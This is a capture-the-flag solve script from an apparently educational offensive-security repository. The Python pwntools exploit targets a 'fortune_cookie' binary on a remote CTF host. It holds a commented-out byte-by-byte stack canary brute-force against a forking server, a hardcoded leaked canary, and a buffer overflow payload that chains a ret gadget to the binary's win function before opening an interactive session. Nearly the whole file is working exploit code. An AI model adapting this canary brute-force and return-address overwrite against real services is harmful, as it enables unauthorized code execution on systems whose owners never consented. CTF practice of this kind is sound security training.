emln/OffSec-CTF
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
OffSec-CTF/canary/02_fortune_cookie/solve.py
emln 9f240eba3b Second CTFs part
2026-05-10 20:42:33 +02:00

57 lines
1.3 KiB
Python
Raw Permalink Blame History

#!/usr/bin/env python3
import time
from pwn import *
HOST, PORT = "offsec.m0lecon.it", 13569
# HOST, PORT = '127.0.0.1', 4444
OFFSET_TO_CANARY = 72
OFFSET_TO_RIP = OFFSET_TO_CANARY + 8 + 8
elf = ELF("./fortune_cookie", checksec=False)
# bruteforce canary on fork server
known = b"\x00"
"""for i in range(7):
for bval in range(256):
guess = known + bytes([bval])
payload = b"A" * OFFSET_TO_CANARY + guess
io = remote(HOST, PORT, level='error')
io.recvuntil(b"wish\n")
io.send(payload)
try:
data = io.recv(timeout=0.2)
except EOFError:
data = b""
io.close()
if b"OK" in data:
known = guess
log.success(f"byte {i+1}: {bval:02x}")
break
"""
# canary = u64(known)
canary = 0x4F03B0B41EBDDB00
log.info(f"Canary: {canary:#x}")
# gadget = 0x4013cf
gadget = 0x000000000040190D
gadget4 = 0x0000000000401016
gadget3 = 0x0000000000401438
gadget2 = 0x40101A
io = remote(HOST, PORT)
io.recvuntil(b"wish\n")
payload = flat(
b"A" * OFFSET_TO_CANARY,
p64(canary),
# b'B' * 8,
b"B" * (OFFSET_TO_RIP - OFFSET_TO_CANARY - 8),
p64(gadget2), # Gadget
p64(elf.sym.win),
)
io.send(payload)
# io.recvline()
io.interactive()
# io.sendline(b'ls')
io.recvline()
Reference in New Issue View Git Blame Copy Permalink